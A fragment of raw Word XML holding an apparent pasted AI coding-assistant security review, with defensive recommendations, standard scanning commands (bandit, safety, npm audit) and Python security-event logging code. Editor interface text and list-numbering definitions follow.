          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🟢</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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Medium (Fix When Possible):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436CC06" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Logging Security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 Secure audit logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DC40B" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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API Security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Validate all API endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D96A6DE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Frontend Security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Implement CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CA0CA" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Infrastructure Security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HTTPS enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09012EE4" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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7. Security Testing Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D709B93" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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A. Automated Security Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D1977" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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shellscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7596B382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Run security scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317174CB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bandit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-r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backend/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-f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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-o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security-scan-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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results.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="689A5F3E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safety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check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544C304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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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audit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for frontend dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA1CBD" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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B. Manual Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D3F8C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Penetration Testing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Regular security audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBC33D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Code Review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Security-focused code reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CADCBC8" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Dependency Scanning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Regular dependency updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FA294" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Vulnerability Assessment</w:t>
      </w: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Regular security assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCE965" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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8. Security Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D52BB88" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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A. Real-time Security Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1235B" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E61075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Security event logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F122D65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6D3994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log_security_event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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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event_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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6D3994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details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2764742E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security_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="53C9BF2F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'timestamp'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datetime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utcnow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D399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()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7DB849EF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event</w:t>
      </w:r>
      <w:proofErr w:type="gram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_type</w:t>
      </w:r>
      <w:proofErr w:type="spell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event_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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21F94A31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user</w:t>
      </w:r>
      <w:proofErr w:type="gram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_id</w:t>
      </w:r>
      <w:proofErr w:type="spell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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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739FF0B8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'details'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details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59E2C884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ip</w:t>
      </w:r>
      <w:proofErr w:type="gram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_address</w:t>
      </w:r>
      <w:proofErr w:type="spell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request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remote_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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6C334B97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user</w:t>
      </w:r>
      <w:proofErr w:type="gram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_agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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request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headers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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D399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'User-Agent'</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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</w:p>
    <w:p w14:paraId="06E7BF51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</w:p>
    <w:p w14:paraId="03A349CA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2A52892D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Log to secure audit trail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B653F11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audit_service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log_security_event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security_log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36314019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1A74DF84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Alert on critical events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF9C07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D399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if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event_type </w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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in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'auth_failure'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'sql_injection_attempt'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D3994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'xss_attempt'</w:t>
      </w:r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3C01808D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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alerting_service</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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6D3994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send_security_alert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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D399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security_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D399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20AD6A0E" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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comprehensive test suite I created provides a solid foundation for identifying and addressing these security issues. The tests are currently passing, but the security framework is in place to catch vulnerabilities as they're introduced or discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA63D8" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Review Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A651741" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A04E3" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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89.0%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA3E00" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A0A0A"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast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1 Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06894F0F" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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</w:p>
    <w:p w14:paraId="5CAAA9BF" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Plan, search, build anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3EE02D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A0A0A"/>
        <w:spacing w:after="0" w:line="180" w:lineRule="atLeast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6D3994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Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>⌘</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="792AE560" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="180" w:lineRule="atLeast"/>
        <w:textAlignment w:val="center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Auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE9B91" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>main*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E930815" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Launchpad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9D196" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>188 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA5E07" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>TypeScript JSX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E561A04" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783105BC" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5E7EC" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Spaces: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F0E7E" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Ln 1, Col 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772BD5BB" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>JOHNNIE WATSON III (1 day ago)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B35E98" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Cursor Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740CA34" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="330" w:lineRule="atLeast"/>
        <w:textAlignment w:val="top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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>JOHNNIE WATSON III, 2 days ago</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A16B1" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Info: Do you want to install the recommended 'GitHub Actions' extension from GitHub for comprehensive-test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>suite.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3994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21654A10" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="atLeast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Switch AI model (</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>⌘</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D6FF69" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3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 Host Unresponsive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64113071" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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extension host has stopped responding. You can wait a moment or reload this window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C3BF7" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:jc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Reload Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73152F32" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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3994">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RecommendationsInstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EC0816A" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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DF678A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60FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBE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045EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E948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F341D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCAC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65C15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5D6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715A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="413A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B667C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6EA1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AA096A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="941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31B09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A342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B202F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D22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80B51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7B6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3C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FD6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71EC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A314D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6156C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3E68E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D03D31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89FA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1E535E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6B2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674F67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9E0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422DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83FC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E12D54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6848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A32430"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5FE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BB490F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="042E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F74605"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D36A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A21CF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB62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FF7236"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D1C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B70F30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC2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345241"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B446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C449CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BE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49569E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6840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EE1783"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5394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EE58BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="548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F472C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB22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837553"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9230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DA4774"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D76E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2068B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE92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897B96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE9E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926C8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C814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E06F1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="854E60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334A2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A70C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C77812"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D5E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DC083D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64F8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8C2469"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0296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7D0227"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A52E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B14DA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FDA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1C5519"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F252E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E4E48BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FB8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C73CEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48BE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7B1B97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D2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0A09BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06F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D52FD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9B8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145CCD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6B8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745468"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7B0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451844"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C20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673E67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49C0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04332E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37C6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D52347"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0394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2F0178"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED8C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41D6870"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="991A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E77193"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B234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910563"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C80E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A67EB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="508E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1676A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4C8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C694701"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C30E5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D08083C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CDC5A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ECA04BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBF6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57069C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A0A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1CC6745"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1500EC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7A79E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="340E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EF11C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2D855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4292930"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4906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4E7183A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E6A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963FDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63A67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6D5223E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5CE6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775258C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B06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8D7B45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CFC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E674DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF4E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99F1825"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="078E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B582868"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A6A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EC6F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06A0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6E4D24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FE8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C730C81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA22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903457">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1555048040">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2131245883">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1427657258">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1360232417">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1877035694">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1757708010">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1705785988">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="434054336">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="649677247">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="415440823">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2005164114">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1738936710">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1252155129">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="618797163">
    <w:abstractNumId w:val="32"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="600113936">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="897395545">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="577447894">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1734691324">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1106804322">
    <w:abstractNumId w:val="14"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1963488501">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="785658205">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1481730990">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="859514362">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1009679619">
    <w:abstractNumId w:val="23"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1151943229">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="717559224">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1755392171">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="556553353">
    <w:abstractNumId w:val="50"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1267036979">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1925528560">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1938169042">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="353960545">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1131089900">
    <w:abstractNumId w:val="75"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1646934996">
